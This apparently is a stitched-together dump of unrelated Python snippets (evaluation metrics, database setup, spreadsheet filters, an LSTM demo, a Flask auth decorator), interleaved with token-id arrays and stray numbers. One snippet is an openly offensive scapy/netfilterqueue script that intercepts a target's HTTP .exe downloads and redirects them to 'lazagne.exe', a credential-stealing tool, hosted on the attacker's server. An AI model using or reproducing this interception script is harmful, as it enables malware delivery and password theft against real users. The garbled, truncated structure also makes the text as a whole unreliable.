np.mean(np.array(performance, dtype=float), axis=0) csv_lines.append(["arithmetic mean", ""] + list(amean_performance)) hmean_performance = scipy.stats.hmean(np.maximum(np.array(performance, dtype=float), sys.float_info.epsilon), axis=0) csv_lines.append(["harmonic mean", ""] + 
list(hmean_performance)) csv_lines.append([]) del data del model if mode: csv_lines.append(["", "", "AUC", "pAUC", "precision", "recall", "F1 score"]) # calculate averages for AUCs and pAUCs amean_performance = np.mean(np.array(performance_over_all, dtype=float), axis=0) csv_lines.append(["arithmetic mean over all machine types, sections, and domains", ""] + list(amean_performance)) hmean_performance = scipy.stats.hmean(np.maximum(np.array(performance_over_all, dtype=float), sys.float_info.epsilon), axis=0) csv_lines.append(["harmonic mean over all machine types, sections, and domains", ""] + list(hmean_performance)) csv_lines.append([]) # output results result_path = "{result}/{file_name}".format(result=param["result_directory"], file_name=param["result_file"]) com.logger.info("results -> {}".format(result_path)) save_csv(save_file_path=result_path, save_data=csv_lines)
[ 29113, 29113, 7804, 201, 198, 2, 1330, 4277, 12782, 201, 198, 29113, 29113, 7804, 201, 198, 11748, 28686, 201, 198, 11748, 269, 21370, 201, 198, 11748, 25064, 201, 198, 11748, 308, 66, 201, 198, 29113, 29113, 7804, 201, 198, 201, 198, ...
2.042251
5,420
#!/usr/bin/env python

import netfilterqueue
import scapy.all as scapy

ack_list = []


def process_packet(packet):
    """Modify downloads files on the fly while target uses HTTP/HTTPS.
    Do not forget to choose the port you will be using in line 22/29.
    Do not forget to modify line 24 and 35 and uncomment them afterwards."""
    scapy_packet = scapy.IP(packet.get_payload())
    if scapy_packet.haslayer(scapy.Raw):
        if scapy_packet[scapy.TCP].dport == #CHOOSE PORT HERE: 80 / 10000:
            # print("HTTP Request")
            if ".exe" in scapy_packet[scapy.Raw].load and #Input IP of your web server here: "10.0.2.15" not in scapy_packet[scapy.Raw].load:
                print("Captured .exe file in the Request packet.")
                ack_list.append(scapy_packet[scapy.TCP].ack)
                # print(scapy_packet.show())
        elif scapy_packet[scapy.TCP].sport == #CHOOSE PORT HERE: 80 / 10000:
            # print("HTTP Response")
            if scapy_packet[scapy.TCP].seq in ack_list:
                ack_list.remove(scapy_packet[scapy.TCP].seq)
                print("Replacing the file.")
                # print(scapy_packet.show())
                modified_packet = set_load(scapy_packet, #Input the full path of your executable here: "HTTP/1.1 301 Moved Permanently\nLocation: http://10.0.2.15/Evil%20Files/lazagne.exe\n\n")
                packet.set_payload(str(modified_packet))

    packet.accept()


queue = netfilterqueue.NetfilterQueue()
queue.bind(0, process_packet)
queue.run()
[ 2, 48443, 14629, 14, 8800, 14, 24330, 21015, 198, 198, 11748, 2010, 24455, 36560, 198, 11748, 629, 12826, 13, 439, 355, 629, 12826, 198, 198, 441, 62, 4868, 796, 17635, 628, 198, 4299, 1429, 62, 8002, 316, 7, 8002, 316, 2599, 198, 2...
2.264793
676
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy import create_engine
from sqlalchemy import Column, Integer, String, Text, ForeignKey, DateTime, func, Boolean
from sqlalchemy.orm import relation, sessionmaker, relationship, backref
from datetime import datetime
import os

# Database
DATABASE = 'sqlite:///db.sqlite3'
DEBUG = True

# ORM
Base = declarative_base()

# model
#

if __name__ == '__main__':
    # connection
    engine = create_engine(DATABASE, echo = DEBUG)
    session_factory = sessionmaker(bind = engine)
    session = session_factory()

    # initialize database
    if not os.path.exists('db.sqlite3'):
        Base.metadata.create_all(engine)
[ 6738, 44161, 282, 26599, 13, 2302, 13, 32446, 283, 876, 1330, 2377, 283, 876, 62, 8692, 198, 6738, 44161, 282, 26599, 1330, 2251, 62, 18392, 198, 6738, 44161, 282, 26599, 1330, 29201, 11, 34142, 11, 10903, 11, 8255, 11, 8708, 9218, 11...
3.122642
212
from openpyxl import Workbook

wb = Workbook()
ws = wb.active

data = [
    ["Fruit", "Quantity"],
    ["Kiwi", 3],
    ["Grape", 15],
    ["Apple", 3],
    ["Peach", 3],
    ["Pomegranate", 3],
    ["Pear", 3],
    ["Tangerine", 3],
    ["Blueberry", 3],
    ["Mango", 3],
    ["Watermelon", 3],
    ["Blackberry", 3],
    ["Orange", 3],
    ["Raspberry", 3],
    ["Banana", 3]
]

for r in data:
    ws.append(r)

ws.auto_filter.ref = "A1:B15"
ws.auto_filter.add_filter_column(0, ["Kiwi", "Apple", "Mango"])
ws.auto_filter.add_sort_condition("B2:B15")

wb.save("filtered.xlsx")
[ 6738, 1280, 9078, 87, 75, 1330, 5521, 2070, 198, 198, 39346, 796, 5521, 2070, 3419, 198, 18504, 796, 266, 65, 13, 5275, 198, 198, 7890, 796, 685, 198, 220, 220, 220, 14631, 37, 4872, 1600, 366, 31208, 33116, 198, 220, 220, 220, 1463...
2.090253
277
from bleak import BleakClient
import asyncio
import functools

notify_uuid = "00002a19-0000-1000-8000-00805f9b34fb".format(0x2A19)

if __name__ == "__main__":
    run(
        ["96E8409A-F2EB-4029-B3DC-615FADE0C838", "D31CB0CA-890E-476B-80D9-80ED8A3AA69A"]
    )
[ 6738, 30942, 1330, 17175, 461, 11792, 198, 11748, 30351, 952, 198, 11748, 1257, 310, 10141, 198, 198, 1662, 1958, 62, 12303, 312, 796, 366, 2388, 17, 64, 1129, 12, 2388, 12, 12825, 12, 33942, 12, 405, 28256, 69, 24, 65, 2682, 21855, ...
1.948529
136
if __name__ == '__main__':
    keys = [15, 10, 20, 8, 12, 16, 25]
    root = constructBST(keys)
    inorder(root)
[ 361, 11593, 3672, 834, 6624, 705, 834, 12417, 834, 10354, 198, 220, 220, 220, 8251, 796, 685, 1314, 11, 838, 11, 1160, 11, 807, 11, 1105, 11, 1467, 11, 1679, 60, 198, 220, 220, 220, 6808, 796, 5678, 33, 2257, 7, 13083, 8, 198, 2...
2.173077
52
from ndebug import env_helpers
[ 6738, 299, 24442, 1330, 17365, 62, 16794, 364, 628, 198 ]
3.3
10
#!/usr/bin/python
'''*****************************************************************************************************************
    Seeed Studio Relay Board Library V2
    Test Application #2
    By John M. Wargo (https://www.johnwargo.com)
********************************************************************************************************************'''

import sys
import time

from seeed_relay_v1 import Relay


# Now see what we're supposed to do next
if __name__ == "__main__":
    # Create the relay object
    relay = Relay()
    try:
        process_loop()
    except KeyboardInterrupt:
        print("\nExiting application")
        # turn off all of the relays
        relay.all_off()
        # exit the application
        sys.exit(0)
[ 2, 48443, 14629, 14, 8800, 14, 29412, 198, 7061, 6, 17174, 17174, 17174, 8412, 9, 198, 220, 220, 220, 1001, 2308, 11733, 4718, 323, 5926, 10074, 569, 17, 198, 220, 220, 220, 6208, 15678, 1303, 17, 198, 220, 220, 220, 2750, 1757, 337...
3.337719
228
import os

from sqlalchemy import bindparam, create_engine, exc
from sqlalchemy.dialects.postgresql.json import JSONB
from sqlalchemy.engine.url import URL
from sqlalchemy.sql import text

from .utils import log, logerr

# Setup SQL Alchemy vars.
pg_opts = {
    'drivername': os.getenv('PG_DRIVER'),
    'username': os.getenv('PG_USER'),
    'password': os.getenv('PG_PASSWORD'),
    'host': os.getenv('PG_HOST'),
    'port': os.getenv('PG_PORT'),
    'database': os.getenv('PG_DATABASE')
}

pg_ssl = os.getenv('PG_SSL')
[ 11748, 28686, 198, 198, 6738, 44161, 282, 26599, 1330, 11007, 17143, 11, 2251, 62, 18392, 11, 2859, 198, 6738, 44161, 282, 26599, 13, 38969, 478, 82, 13, 7353, 34239, 13976, 13, 17752, 1330, 19449, 33, 198, 6738, 44161, 282, 26599, 13, ...
2.563725
204
import abc


def make_selector(selector, **kwargs):
    output = '@' + selector
    if not kwargs:
        return output
    return '%s[%s]' % (output, str_pairs(kwargs.items()))


GlobalEntity = _GlobalEntity()
PosUtil = _PosUtil()


def StackFrame(index):
    return StackFramePath


StackFrameHead = StackFrame(0)


def ensure_selector(sel_arg):
    assert isinstance(sel_arg, EntityRef), sel_arg
    return sel_arg


UtilBlockPos = _UtilBlockPos(False)
ZeroTickBlockPos = _UtilBlockPos(True)
[ 11748, 450, 66, 198, 198, 4299, 787, 62, 19738, 273, 7, 19738, 273, 11, 12429, 46265, 22046, 2599, 198, 220, 220, 220, 5072, 796, 705, 31, 6, 1343, 31870, 198, 220, 220, 220, 611, 407, 479, 86, 22046, 25, 198, 220, 220, 220, 220, ...
2.536082
194
import requests

keyword = "python"
try:
    kv = {'q': keyword}
    r = requests.get('http://www.so.com/s', params=kv)
    print(r.request.url)
    r.raise_for_status()
    print(len(r.text))
except:
    print('')
[ 11748, 7007, 198, 198, 2539, 4775, 796, 366, 29412, 1, 198, 28311, 25, 198, 220, 220, 220, 479, 85, 796, 1391, 6, 80, 10354, 2539, 4775, 92, 198, 220, 220, 220, 374, 796, 7007, 13, 1136, 10786, 4023, 1378, 2503, 13, 568, 13, 785, ...
2.151515
99
import torch.nn as nn
[ 11748, 28034, 13, 20471, 355, 299, 77, 628, 198 ]
2.666667
9
from django.contrib import admin

from .models import File

admin.site.register(File)
[ 6738, 42625, 14208, 13, 3642, 822, 1330, 13169, 198, 6738, 764, 27530, 1330, 9220, 198, 198, 28482, 13, 15654, 13, 30238, 7, 8979, 8, 198 ]
3.4
25
import shutil import socket import subprocess import threading import json import pickle import tempfile import time import box import threading import os import base64 import getpass import urllib import requests import zipfile import sys import pprint import platform DEBUG = True BPH_TEMPLATE_SERVER_IP = sys.argv[1] BPH_TEMPLATE_SERVER_PORT = int(sys.argv[2]) BPH_CONTROLLER_WEB_PORT = int(sys.argv[3]) running_os = platform.release() if running_os == "7": APP_DATA = "C:\\Users\\{current_user}\\AppData\\Roaming\\".format( current_user=getpass.getuser()) TMP_FOLDER = "C:\\Users\\{current_user}\\AppData\\Local\\Temp\\".format( current_user=getpass.getuser()) elif running_os == "XP": # To avoid tool issues when dealing with white-spaced paths. APP_DATA = "C:\\DOCUME~1\\{current_user}\\APPLIC~1\\".format( current_user=getpass.getuser()) TMP_FOLDER = "C:\\DOCUME~1\\{current_user}\\LOCALS~1\\Temp\\".format( current_user=getpass.getuser()) else: print "Unsupported platform! Exiting..." sys.exit() if __name__ == "__main__": agent = Agent() try: agent.start() while True: # agent.check_connection() if not agent.is_connected(): # If agent stops. Start it again. agent.start() except KeyboardInterrupt: print "Manual interruption. Bye!" sys.exit()
[ 11748, 4423, 346, 201, 198, 11748, 17802, 201, 198, 11748, 850, 14681, 201, 198, 11748, 4704, 278, 201, 198, 11748, 33918, 201, 198, 11748, 2298, 293, 201, 198, 11748, 20218, 7753, 201, 198, 11748, 640, 201, 198, 11748, 3091, 201, 198, ...
2.23486
677
# LSTM with Variable Length Input Sequences to One Character Output import numpy from keras.models import Sequential from keras.layers import Dense from keras.layers import LSTM from keras.utils import np_utils from keras.preprocessing.sequence import pad_sequences from theano.tensor.shared_randomstreams import RandomStreams # fix random seed for reproducibility numpy.random.seed(7) # define the raw dataset alphabet = "ABCDEFGHIJKLMNOPQRSTUVWXYZ" # create mapping of characters to integers (0-25) and the reverse char_to_int = dict((c, i) for i, c in enumerate(alphabet)) int_to_char = dict((i, c) for i, c in enumerate(alphabet)) # prepare the dataset of input to output pairs encoded as integers num_inputs = 16 max_len = 5 dataX = [] dataY = [] for i in range(num_inputs): start = numpy.random.randint(len(alphabet)-2) end = numpy.random.randint(start, min(start+max_len,len(alphabet)-1)) sequence_in = alphabet[start:end+1] sequence_out = alphabet[end + 1] dataX.append([char_to_int[char] for char in sequence_in]) dataY.append(char_to_int[sequence_out]) print( sequence_in, '->', sequence_out ) # convert list of lists to array and pad sequences if needed X = pad_sequences(dataX, maxlen=max_len, dtype='float32') # reshape X to be [samples, time steps, features] X = numpy.reshape(X, (X.shape[0], max_len, 1)) # normalize X = X / float(len(alphabet)) # one hot encode the output variable y = np_utils.to_categorical(dataY) # create and fit the model batch_size = 1 model = Sequential() model.add(LSTM(16, batch_input_shape=(batch_size, X.shape[1], X.shape[2]), stateful=True)) model.add(Dense(y.shape[1], activation='softmax')) model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy']) for i in range(1): model.fit(X, y, nb_epoch=1, batch_size=batch_size, verbose=2, shuffle=False) model.reset_states() # summarize performance of the model scores = model.evaluate(X, y, batch_size=batch_size, verbose=0) model.reset_states() print("Model Accuracy: %.2f%%" % (scores[1]*100)) # demonstrate some model predictions for i in range(1): pattern_index = numpy.random.randint(len(dataX)) pattern = dataX[pattern_index] x = pad_sequences([pattern], maxlen=max_len, dtype='float32') x = numpy.reshape(x, (1, max_len, 1)) x = x / float(len(alphabet)) prediction = model.predict(x, verbose=0) index = numpy.argmax(prediction) result = int_to_char[index] seq_in = [int_to_char[value] for value in pattern] print( seq_in, "->", result )
[ 2, 406, 2257, 44, 351, 35748, 22313, 23412, 24604, 3007, 284, 1881, 15684, 25235, 201, 198, 11748, 299, 32152, 201, 198, 6738, 41927, 292, 13, 27530, 1330, 24604, 1843, 201, 198, 6738, 41927, 292, 13, 75, 6962, 1330, 360, 1072, 201, 1...
2.638579
985
""" Direction prediction based on learning dataset from reactome PPI direction calculated from domain interaction directions """ # Imports import sqlite3, csv, os import pandas as pd import logging import pickle # # Initiating logger # logger = logging.getLogger() # handler = logging.FileHandler('../../workflow/SLK3.log') # logger.setLevel(logging.DEBUG) # handler.setLevel(logging.DEBUG) # formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s') # handler.setFormatter(formatter) # logger.addHandler(handler) if __name__ == '__main__': test = DirScore() logger.debug('Creating test set') test.test_scores() logger.debug('Adding scores to dataset') test.apply_to_db() logger.debug('Direction prediction done')
[ 37811, 198, 35, 4154, 17724, 1912, 319, 4673, 27039, 422, 6324, 462, 198, 10246, 40, 4571, 10488, 422, 7386, 10375, 11678, 198, 37811, 198, 198, 2, 1846, 3742, 198, 11748, 44161, 578, 18, 11, 269, 21370, 11, 28686, 198, 11748, 19798, ...
3.039216
255
import json
import os.path
import sys

from exceptions import *
from create_folder_structure import create_folder_structure


main()
[ 11748, 33918, 198, 11748, 28686, 13, 6978, 198, 11748, 25064, 198, 6738, 13269, 1330, 1635, 198, 6738, 2251, 62, 43551, 62, 301, 5620, 1330, 2251, 62, 43551, 62, 301, 5620, 628, 198, 198, 12417, 3419, 198 ]
3.694444
36
from datetime import timedelta

import pytest
from model_bakery import baker
[ 6738, 4818, 8079, 1330, 28805, 12514, 198, 198, 11748, 12972, 9288, 198, 6738, 2746, 62, 65, 33684, 1330, 46412, 628 ]
3.9
20
from flask import request
from google.auth.transport import requests
import google.oauth2.id_token

from server.ApplikationsAdministration import ApplikationsAdministration
# Benutzer.py, BenutzerMapper + Benutzer methods are in ApplikationsAdministration


def secured(function):
    """Decorator for Google Firebase-based authentication of users.

    Since this system is a basic case study for teaching purposes, an
    elaborate authorization concept was deliberately omitted here. Rather,
    this decorator is meant to show one way to get started with
    authentication at a technically justifiable effort.

    POLICY: The policy demonstrated here is that anyone who holds an
    account accepted by Firebase can log in to this system. On each login,
    the real name, mail address, and Google User ID are stored or updated
    in our system. In this way, a future extension of the system could
    fall back on that data.
    """
    firebase_request_adapter = requests.Request()

    return wrapper
[ 6738, 42903, 1330, 2581, 198, 6738, 23645, 13, 18439, 13, 7645, 634, 1330, 7007, 198, 11748, 23645, 13, 12162, 1071, 17, 13, 312, 62, 30001, 198, 198, 6738, 4382, 13, 4677, 46965, 602, 41862, 1358, 1330, 39100, 1134, 602, 41862, 1358, ...
2.821608
398